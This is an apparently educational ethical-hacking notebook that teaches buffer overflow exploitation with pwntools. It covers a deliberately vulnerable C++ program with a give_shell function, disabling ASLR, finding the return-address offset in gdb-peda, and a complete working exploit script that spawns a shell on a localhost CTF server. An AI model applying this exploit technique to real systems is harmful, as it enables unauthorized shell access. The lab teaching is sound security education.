# Exploit Code

- code/program that delivers payload is called exploit code
- helps delivers the shellcode code directly to the vulnerable program
    - over network, stdio, program argument, etc.
- you can create a exploitcode in Bash, Python, C/C++, etc. to send the payload to the vulnerable target program
- this notebook demostrates how to write exploit code using Python script

## Python exploit code

- Python is a popular language among security professionals
- there are a lot of third-party libraries, frameworks and software created for security-related tasks (CTF, pen-testing, vulnerabiliy scanning, etc.) using Python
- we'll use pwntools library - [https://github.com/Gallopsled/pwntools#readme](https://github.com/Gallopsled/pwntools#readme) for generating the exploit code template and exploiting our vulnerable target program
- make sure pwntools is installed on your system

### pwntools and CTF
- pwntools is designed for quick exploitation in CTF environments
- most CTF environments use client-server architecture
    - flag is on the server
    - you interact to the server from a remote client
    - exploit the server program and capture the flag (CTF)
    
- you can easily create a server using netcat (nc) program in listening mode
- you can also execute a binary/program when client connects to it
- let's look into the `demos/ctf` folder that tries to simulate the CTF-like environment
- we'll use the `demos/ctf/vuln.cpp` program to demonstrate how **pwntools** framework can be used to create exploit code using Python
- a good YouTube video on Pwn Template and Input / Output is found here: https://www.youtube.com/watch?v=NhNbivMVPk0&ab_channel=ChristopherSchafer](https://www.youtube.com/watch?v=NhNbivMVPk0&ab_channel=ChristopherSchafer)

In [9]:
! ls -al ./demos/ctf

total 20
drwxr-xr-x 2 kali kali 4096 Dec 15 14:22 .
drwxr-xr-x 7 kali kali 4096 Dec 15 13:57 ..
-rw-r--r-- 1 kali kali   16 Dec 15 13:56 flag.txt
-rw-r--r-- 1 kali kali 1024 Dec 15 14:10 Makefile
-rw-r--r-- 1 kali kali 1277 Dec 15 14:17 vuln.cpp


In [10]:
! cat ./demos/ctf/vuln.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdou

### compile using the provided Makefile

- `make` command must be run as sudo, as the Makefile also disables randomize_va_space

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ sudo make
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
0
g++ -g -Wall -m32 -fno-stack-protector -z execstack -no-pie vuln.cpp  -o vuln.exe 

(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ ls -al
total 56
drwxr-xr-x 2 kali kali  4096 Dec 15 14:25 .
drwxr-xr-x 7 kali kali  4096 Dec 15 13:57 ..
-rw-r--r-- 1 kali kali    16 Dec 15 13:56 flag.txt
-rw-r--r-- 1 kali kali  1024 Dec 15 14:10 Makefile
-rw-r--r-- 1 kali kali  1277 Dec 15 14:17 vuln.cpp
-rwxr-xr-x 1 root root 33776 Dec 15 14:25 vuln.exe <---- 
```

- let's make sure the binary doesn't have any security controls in place to prevent overflow exploitation
- we can use pwntools **checksec** command

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ pwn checksec 
usage: pwn checksec [-h] [--file [elf [elf ...]]] [elf [elf ...]]
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ pwn checksec vuln.exe
[*] '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
```

- run netcat on localhost port 1234 and execute the vuln.exe program when client connects to it

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ nc -l -p 1234 -e vuln.exe
```

- from another terminal, use netcat to connect to localhost 1234

```bash
(base) kali@kali:~$ nc localhost 1234
buffer is at 0xffffc1a0
Give me some text: do your read this?
Acknowledged: do your read this?
Good bye!
```

- now let's use pwntools to create a exploit code template
- to create exploit template, we need the following:
    - name of the target program
    - ip of the host the binary will be runnin on (use 127.0.0.1 loopback for localhost as in this demo)
    - the port number the server is listening on

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ pwn template ./vuln.exe --host localhost --port 1234 > exploit.py
```

- the generated exploit.py file provides a lot of boiler-plate code:
    - for automatically detecting architecture of the target program
    - stdio framework to interact with the target program locally or remotely
        - the same code works without little or no modification
    - debug feature to display hexdump of stdio
    - feature to generate the shellcode, etc.

- let's look at the content of the exploit.py

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln.exe --host 127.0.0.1 --port 1234
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '127.0.0.1'
port = int(args.PORT or 1234)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

io.interactive()

```

- now let's do a quick test of the exploit code
- make sure the nc server is listening on localhost port 1234 to run vuln.exe on connection

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ nc -v -l 127.0.0.1 -p 1234 -e vuln.exe
listening on [any] 1234 ...
```

- open another terminal and run the exploit code exploit.py 

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ python exploit.py
[*] '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to 127.0.0.1 on port 1234: Done
[*] Switching to interactive mode
buffer is at 0xffffc1a0
Give me some text: $ do you read this?
Acknowledged: do you read this?
Good bye!
[*] Got EOF while reading in interactive
$  
```

- NOTE that when the netcat server finished executing the vuln.exe program upon client's connection it'll then exit
- you'll have to manually run the netcat again inorder to interact with a client again...
- this can be annoying as we'll have to interact with the vulnerable program many times
- bash script comes to our rescue!

In [11]:
! cat ./demos/ctf/netcat-loop.sh

#! /bin/bash

# script to run netcat server in a loop

while true
do
    nc -v -l 127.0.0.1 -p 1234 -e vuln.exe
done

- from terminal, run the bash script, so server is listening indefinitely one clinet after another
- from another terminal, continously connect to the server without having to rerun the server!

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ bash netcat-loop.sh 
listening on [any] 1234 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41074
listening on [any] 1234 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41076
listening on [any] 1234 ...
```

### pwntools stdio demo

- run exploit_demo.py file and see the programming interactions for send and receive data from the target program

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ python exploit_demo.py 
[*] '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to 127.0.0.1 on port 1234: Done
received:  b'buffer is at 0xffffc1a0'
[*] Switching to interactive mode
Give me some text: $ type some data
Acknowledged: Data sent by code type some data
Good bye!
[*] Got EOF while reading in interactive
$  
```

- armed with this knowledge, let's complete the exploit code
- the goal is to force the target program to execute **give_shell()**

#### steps
1. find the offset required to overwrite the caller's return address
2. find the address of **give_shell()**
3. send some junk and the controlled address to execute **give_shell()**

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ gdb -q vuln.exe
Reading symbols from vuln.exe...

gdb-peda$ pattern create 200 pattern.txt
Writing pattern of 200 chars to filename "pattern.txt"

gdb-peda$ run < pattern.tx
Starting program: /home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe < pattern.tx
buffer is at 0xffffc2f0
Give me some text: Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef7160 (<_ZNSoD1Ev>:     push   ebx)
EBX: 0x6c414150 ('PAAl')
ECX: 0x6c0 
EDX: 0x8051bb0 ("Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAA"...)
ESI: 0xf7de6000 --> 0x1e4d6c 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffc380 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffc380 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffc384 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffc388 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffc38c ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffc390 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffc394 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffc398 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffc39c ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()

gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 132
EBP+0 found at offset: 136
EIP+0 found at offset: 140 <---------- 140 JUNK + 4 bytes return address!!!
Registers point to pattern buffer:
[ESP] --> offset 144 - size ~56   
Pattern buffer found at:
0x08051bbe : offset    0 - size  200 ([heap])
0x08051fc0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc2f0 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
References to pattern buffer found at:
0xf7de6584 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6588 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de658c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6590 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6594 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6598 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de659c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7e62d2c : 0xffffc2f0 (/usr/lib32/libstdc++.so.6.0.28)
0xffffbde0 : 0xffffc2f0 ($sp + -0x5a0 [-360 dwords])

```

- GDB-PEDA says that we need 140 bytes of JUNK + 4 bytes to overwrite the caller's return address
- since the vuln.exe program prints `buffer is at ....`, let's receive and discard it
- it then prompts user 
- let's add `io.send("A"*140)` line to our exploit_vuln.py file

- now let's find the address of **give_shell()**

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ nm vuln.exe 
0804c040 B __bss_start
0804c040 b completed.0
         U __cxa_atexit@@GLIBC_2.1.3
0804c038 D __data_start
0804c038 W data_start
08049140 t deregister_tm_clones
08049120 T _dl_relocate_static_pie
080491c0 t __do_global_dtors_aux
0804bef8 d __do_global_dtors_aux_fini_array_entry
0804c03c D __dso_handle
0804befc d _DYNAMIC
0804c040 D _edata
0804c044 B _end
         U fflush@@GLIBC_2.0
080494d8 T _fini
0804a000 R _fp_hw
080491f0 t frame_dummy
0804bef0 d __frame_dummy_init_array_entry
0804a2ac r __FRAME_END__
         U getchar@@GLIBC_2.0
         U getegid@@GLIBC_2.0
0804c000 d _GLOBAL_OFFSET_TABLE_
08049444 t _GLOBAL__sub_I__Z10give_shellv
         w __gmon_start__
0804a050 r __GNU_EH_FRAME_HDR
08049000 T _init
0804bef8 d __init_array_end
0804bef0 d __init_array_start
0804a004 R _IO_stdin_used
080494d0 T __libc_csu_fini
08049470 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
08049385 T main
         U printf@@GLIBC_2.0
08049180 t register_tm_clones
         U setresgid@@GLIBC_2.0
080490e0 T _start
         U stdout@@GLIBC_2.0
         U system@@GLIBC_2.0
0804c040 D __TMC_END__
08049468 T __x86.get_pc_thunk.ax
080494d1 T __x86.get_pc_thunk.bp
08049130 T __x86.get_pc_thunk.bx
080491f2 T _Z10give_shellv  <----------------- !!!! our target function!!!!
080492d3 T _Z3badv
080493eb t _Z41__static_initialization_and_destruction_0ii
08049238 T _Z5mgetsPc
         U _ZNSolsEPFRSoS_E@@GLIBCXX_3.4
         U _ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4
         U _ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4
         U _ZSt4cout@@GLIBCXX_3.4
         U _ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_@@GLIBCXX_3.4
0804a008 r _ZStL19piecewise_construct
0804c041 b _ZStL8__ioinit
         U _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4

```

- let's add `io.sendline("\xf2\x91\x04\x08") # 080491f2` to the demos/ctf/exploit_vuln.py file
- now the exploit code is ready, let's see the complete exploit code
- see the code added in the FIXME section

```python
####FIXME
....
####
```

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln.exe --host 127.0.0.1 --port 1234
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '127.0.0.1'
port = int(args.PORT or 1234)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments

io = start()

#########################################################FIXME
first_line = io.recvline() # not really needed to do this...
io.send("A"*140)
# pwntools provides better way to pack the addresses!
io.sendline("\xf2\x91\x04\x08") # 080491f2
#########################################################

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

io.interactive()

```

### Local process exploit

- let's run the `demos/ctf/exploit_vuln.py` code first to a local process/program on the same folder!
    - meaning no IP and PORT to connect to
    
```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ python exploit_vuln.py LOCAL
[*] '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe': pid 13307
[*] Switching to interactive mode
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf2\x9
$ whoami
kali
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ 
```

### Remote process exploit

- let's send the payload to the remote server loopback in this example
    - simply remove the LOCAL argument to exploit program
- we get a shell prompt and you can cat the flag.txt file if it was a CTF competition!

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ python exploit_vuln.py 
[*] '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to 127.0.0.1 on port 1234: Done
[*] Switching to interactive mode
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf2\x9
$ ls
exploit_demo.py
exploit.py
exploit_vuln.py
flag.txt
Makefile
netcat-loop.sh
pattern.tx
pattern.txt
peda-session-vuln.exe.txt
vuln.cpp
vuln.exe
$ cat flag.txt
CTF{YayBabbyGet}v$  

```

## Challenge

1. Modify the above C++ demo exploit code to get a regular shell (instead of the root shell)
    - test to make sure the exploit code works


2. Write exploit code for stack_overflow_stdio.cpp demo program
    - exploit gives user shell
    - test to make sure the exploit code works
    
3. Write exploit code for stack_overflow_stdio.cpp demo program
    - exploit gives root shell
    - test to make sure the exploit code works